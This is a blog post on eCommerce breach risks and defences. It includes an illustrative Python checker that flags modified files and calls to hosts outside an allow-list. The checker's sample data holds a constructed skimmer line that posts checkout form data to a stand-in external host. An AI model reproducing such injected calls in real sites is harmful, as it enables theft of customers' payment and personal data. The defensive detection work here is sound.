Blog Post: eCommerce Websites: Assessing the Risk

The last year has seen a significant rise in the quantity and impact of attacks on eCommerce (eCom) websites, which has cumulatively resulted in the exposure of millions of personal data records and, in some cases, cardholder data records.

In many cases, relatively simple attacks have been used to compromise eCom applications despite the best efforts of Information Security staff and standards bodies such as the PCI Security Standards Council (SSC). The potential impacts of data breaches include class action lawsuits, brand/reputational damage, fines from regulators such as the Information Commissioner’s Office (ICO) and card scheme fines from Mastercard and Visa.

Looking further into the recent breaches, there is no doubt that firms such as British Airways, Ticketmaster and Quora will have invested significantly in security and compliance. So where did it all go wrong? Are the standards not strong enough, or have the threats increased in sophistication? Why are breaches which affect millions of people so common?

What can organisations do to ensure that they minimise the risk of a successful eCom attack?

After investigating security across many eCom sites, it is apparent that gaps really do exist in many cases. One problem is that there are so many different ways to attack an eCom site, for example:

  • The underlying platform or environment hosting the eCom application;
  • Libraries, packages or dependencies used by the application;
  • The core web application functionality itself;
  • Network security;
  • Configuration settings across all systems and applications;
  • Remote access and management of the environment, including third parties; and
  • The Content Management System (CMS).

Many organisations only defend against a subset of these attack points or, in some cases, mistakenly believe that one or more contracted third parties are covering certain areas when this may not actually be the case.

Should an attacker gain unauthorised access to an underlying server involved in the delivery of a web site or the CMS application, then it can be straightforward to modify pages and code associated with critical pages such that information entered by a customer is duplicated to another web site under the control of the attacker. 

The issue associated with this particular attack is that the data (sensitive details such as personal data or credit card data) is not necessarily stored on the compromised server itself, but is nevertheless duplicated to a second malicious web site controlled by the attacker. The eCom site will appear to continue to process transactions ‘normally’ and so the attack can remain undetected for some time, harvesting many thousands of stolen records over a period of weeks or months.

This means that it is vitally important to ensure that access to the eCom servers and associated management systems is strongly protected from both internal and external attackers. Additionally, detecting unexpected changes to core code and anomalous outbound calls in client transactions are further measures that can be used to detect such an attack and stop it succeeding.
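As an added illustration (not code from the original post), the two detection measures just described: a baseline integrity check over the deployed files, and a scan of those files for data-sending destinations outside an allow-list. All file names, hosts and contents are constructed for the example.

```python
import hashlib
import re
from urllib.parse import urlparse
# Constructed sample data (not from any real site): the file manifest captured at
# deploy time and the same files as they appear on the server now.
BASELINE_FILES = {
    "checkout.html": b"<form action='/checkout'><input name='card'></form>",
    "checkout.js": b"function submitOrder(f){ return post('https://shop.example/api/order', f); }",
}
CURRENT_FILES = {
    "checkout.html": b"<form action='/checkout'><input name='card'></form>",
    # Injected extra call that copies the form to a host the site does not own.
    "checkout.js": b"function submitOrder(f){ post('https://stats-example.invalid/c', f);"
                   b" return post('https://shop.example/api/order', f); }",
    "helper.js": b"// file that was never part of the release",
}
ALLOWED_HOSTS = {"shop.example"}  # hosts the checkout flow may talk to (assumed)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")

def sha256_manifest(files):
    """Map each file name to the SHA-256 of its contents."""
    return {name: hashlib.sha256(data).hexdigest() for name, data in files.items()}

def detect_changes(baseline, current):
    """Compare two manifests; report every file that was added, removed or modified."""
    findings = []
    for name in sorted(set(baseline) | set(current)):
        if name not in current:
            findings.append((name, "removed"))
        elif name not in baseline:
            findings.append((name, "added"))
        elif baseline[name] != current[name]:
            findings.append((name, "modified"))
    return findings

def unexpected_destinations(files, allowed_hosts):
    """Report (file, host) for every absolute URL whose host is not allow-listed."""
    findings = set()
    for name, data in files.items():
        for url in URL_RE.findall(data.decode("utf-8", "replace")):
            host = urlparse(url).hostname or ""
            if host not in allowed_hosts:
                findings.add((name, host))
    return sorted(findings)

if __name__ == "__main__":
    for finding in detect_changes(sha256_manifest(BASELINE_FILES), sha256_manifest(CURRENT_FILES)):
        print("integrity:", *finding)
    for finding in unexpected_destinations(CURRENT_FILES, ALLOWED_HOSTS):
        print("destination:", *finding)
```

In practice the baseline manifest is generated from the release artefact and stored away from the web server, so that an attacker who modifies the site cannot also update the manifest.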

Prevention

An online web application associated with the delivery of sales transactions can minimise the risk of a successful attack using effective eCom security management, such as:

  • Prevention of attacks with defence-in-depth (multi-layer security)
  • Detection and alerting of anomalies in eCom operation
  • Fast response to attacks to minimise the risk to the business

Regular testing and scanning of the eCom site is an essential baseline: it should be conducted frequently, with anomalies remediated as a priority – after all, attackers are testing and scanning all eCom sites across the Internet continuously.

A challenge mentality should be present in the teams managing the site’s infrastructure, code (whether bespoke, off the shelf eCom software / cloud service or a hybrid of the two) and cyber security. This is preferable to considering penetration testing and vulnerability scanning as “tick box exercises” – even issues rated as low risk should be reviewed and managed as part of an effective risk management regime. 

It is also recommended to conduct regular focused eCom risk assessments on new or existing sites, or when changing underlying application frameworks or adding new features such as voucher codes or customer product reviews.

An effective eCom risk assessment should cover:

  • Platform/technologies in use (hosting, network and software)
  • Effective management of any third parties
  • Resilience of eCom platform
  • Sensitive data stored, processed or transmitted, compliance obligations
  • eCom code and content development, testing and deployment
  • Logging/monitoring, testing and assurance

Baseline security practices such as patching and network security are clearly not sufficient on their own to ensure adequate protection of an eCom website; many different threats and attacks need to be considered.

An eCom risk assessment, combined with regular testing and scanning, will ensure that the many risks of an eCom breach are understood, properly managed and mitigated as far as possible.
